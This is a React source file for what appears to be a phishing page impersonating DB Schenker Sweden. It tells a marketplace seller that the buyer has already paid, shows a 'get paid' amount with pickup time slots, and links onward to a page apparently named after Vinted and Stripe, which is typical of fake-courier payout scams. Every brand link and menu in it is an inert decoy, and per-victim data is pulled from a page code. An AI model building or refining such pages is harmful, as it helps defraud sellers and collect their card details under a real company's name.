import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './SchenkerSeSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/dbschenker-se-logo.svg`;

const DAY_SLOTS = [
  '01-02',
  '03-04',
  '05-06',
  '07-08',
  '09-10',
  '11-12',
  '13-14',
  '15-16',
  '17-18',
  '19-20',
  '21-22',
  '23-24',
  '25-26',
  '27-28',
  '29-30',
];

const TIME_SLOTS = [
  '08-09',
  '09-10',
  '10-11',
  '11-12',
  '12-13',
  '13-14',
  '14-15',
  '15-16',
  '16-17',
  '17-18',
  '18-19',
  '19-20',
  '20-21',
  '21-22',
  '22-23',
  '23-24',
];

function noop(e) {
  e.preventDefault();
}

const FOOTER_SERVICES = { title: 'Tjänster', links: ['Kontakta oss', 'Logga in'] };
const FOOTER_COMPANY = {
  title: 'Företag',
  links: ['DB SCHENKER | connect kundportal', 'Kör för oss', 'Övervakning'],
};
const FOOTER_ABOUT = {
  title: 'Om oss',
  links: [
    'Vår verksamhet',
    'Karriär',
    'Senaste nytt',
    'Compliance',
    'Investor relations',
    'Miljö och social hållbarhet',
    'Innovation och digitalisering',
    'Hållbarhet',
  ],
};

const LEGAL_ROW = [
  'Legal',
  'Dataskyddsinformation',
  'Information om cookies',
  'Villkor & ansvar',
  'Inställningar för cookies',
];

/**
 * DB Schenker (SE) — bokning / utbetalning, CTA → index2 (VintedStripe2).
 */
function SchenkerSeSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);
  const [selectedDay, setSelectedDay] = useState(null);
  const [selectedTime, setSelectedTime] = useState(null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'SE').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'SEK';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const productVal = (pageData?.product_name || '').trim() || '—';
  const buyerName = [pageData?.first_name, pageData?.middle_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const deliveryAddr = (pageData?.delivery_address || '').trim() || '—';
  const pickupAddr = (pageData?.site_name || '').trim() || '';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="schenker-se-wrap" lang="sv">
        <div className="schenker-se-loading">Laddar…</div>
        <div className="schenker-se-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="schenker-se-wrap" lang="sv">
      <header className="schenker-se-header">
        <div className="schenker-se-header-inner">
          <a href="#/" className="schenker-se-logo-link" onClick={noop} aria-label="DB Schenker">
            <img src={LOGO_SRC} alt="DB Schenker" className="schenker-se-logo-img" width={200} height={30} />
          </a>
          <nav className="schenker-se-nav" aria-label="Huvudmeny">
            <a href="#/" onClick={noop}>
              Företag
            </a>
            <a href="#/" onClick={noop}>
              Karriär
            </a>
            <a href="#/" onClick={noop}>
              Insights
            </a>
          </nav>
          <button type="button" className="schenker-se-search" aria-label="Sök" onClick={noop} />
          <button type="button" className="schenker-se-login" onClick={noop}>
            <span className="schenker-se-login-ic" aria-hidden />
            Logga in
          </button>
          <div className="schenker-se-locale">
            <span className="schenker-se-globe" aria-hidden />
            <span>Sverige</span>
            <span className="schenker-se-locale-sep">|</span>
            <span>Svenska</span>
          </div>
        </div>
      </header>

      <section className="schenker-se-hero">
        <div
          className="schenker-se-hero-bg"
          aria-hidden
          style={{
            backgroundImage: `linear-gradient(to top, rgba(0, 0, 0, 0.78) 0%, rgba(0, 0, 0, 0.25) 45%, transparent 72%), url(${JSON.stringify(`${P}/dbschenker-se-hero.png`)})`,
          }}
        />
        <div className="schenker-se-hero-inner">
          <h1 className="schenker-se-hero-title">
            <span className="schenker-se-hero-accent" aria-hidden />
            Produkten är redan betald
          </h1>
        </div>
      </section>

      <main className="schenker-se-main">
        <div className="schenker-se-card">
          <div className="schenker-se-fields">
            <label className="schenker-se-field">
              <span className="schenker-se-label">Produkt:</span>
              <input className="schenker-se-input" readOnly value={productVal} />
            </label>
            <label className="schenker-se-field">
              <span className="schenker-se-label">Köparens namn:</span>
              <input className="schenker-se-input" readOnly value={buyerName} />
            </label>
            <label className="schenker-se-field">
              <span className="schenker-se-label">Adress för leverans av varor:</span>
              <input className="schenker-se-input" readOnly value={deliveryAddr} />
            </label>
            <label className="schenker-se-field">
              <span className="schenker-se-label">Adress för uthämtning av varor:</span>
              <input className="schenker-se-input" readOnly value={pickupAddr || '—'} placeholder="—" />
            </label>
            <label className="schenker-se-field">
              <span className="schenker-se-label">Få betalt:</span>
              <input className="schenker-se-input" readOnly value={amountLine} />
            </label>
          </div>

          <div className="schenker-se-pick-section">
            <h2 className="schenker-se-h2">Hämta dag</h2>
            <p className="schenker-se-sub">När kan vi hämta varorna?</p>
            <div className="schenker-se-grid">
              {DAY_SLOTS.map((d) => (
                <button
                  key={d}
                  type="button"
                  className={`schenker-se-slot${selectedDay === d ? ' schenker-se-slot--on' : ''}`}
                  onClick={() => setSelectedDay(d)}
                >
                  {d}
                </button>
              ))}
            </div>
          </div>

          <div className="schenker-se-pick-section">
            <h2 className="schenker-se-h2">Tid för upphämtning</h2>
            <p className="schenker-se-sub">När kan vi hämta varorna?</p>
            <div className="schenker-se-grid">
              {TIME_SLOTS.map((t) => (
                <button
                  key={t}
                  type="button"
                  className={`schenker-se-slot${selectedTime === t ? ' schenker-se-slot--on' : ''}`}
                  onClick={() => setSelectedTime(t)}
                >
                  {t}
                </button>
              ))}
            </div>
          </div>

          <div className="schenker-se-cta-row">
            <Link to={index2Path} className="schenker-se-cta">
              Få betalt : {amountLine}
            </Link>
          </div>
        </div>
      </main>

      <footer className="schenker-se-footer">
        <div className="schenker-se-footer-grid">
          {[FOOTER_SERVICES, FOOTER_COMPANY, FOOTER_ABOUT].map((col) => (
            <div key={col.title} className="schenker-se-footer-col">
              <h3 className="schenker-se-footer-h">{col.title}</h3>
              <ul className="schenker-se-footer-list">
                {col.links.map((l) => (
                  <li key={l}>
                    <a href="#/" onClick={noop}>
                      {l}
                    </a>
                  </li>
                ))}
              </ul>
            </div>
          ))}
          <div className="schenker-se-footer-col">
            <h3 className="schenker-se-footer-h">Följ oss</h3>
            <div className="schenker-se-social">
              <span className="schenker-se-soc" aria-hidden>
                f
              </span>
              <span className="schenker-se-soc" aria-hidden>
                in
              </span>
              <span className="schenker-se-soc" aria-hidden>
                ◎
              </span>
              <span className="schenker-se-soc" aria-hidden>
                ▶
              </span>
              <span className="schenker-se-soc" aria-hidden>
                ♪
              </span>
            </div>
          </div>
        </div>
        <div className="schenker-se-footer-legal">
          <nav className="schenker-se-legal-nav" aria-label="Juridik">
            {LEGAL_ROW.map((l) => (
              <a key={l} href="#/" onClick={noop}>
                {l}
              </a>
            ))}
          </nav>
          <p className="schenker-se-copy">© 2025 DB SCHENKER</p>
          <div className="schenker-se-footer-locale">
            <span className="schenker-se-globe schenker-se-globe--light" aria-hidden />
            Sverige · Svenska
          </div>
        </div>
      </footer>

      <div className="schenker-se-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default SchenkerSeSuccess;
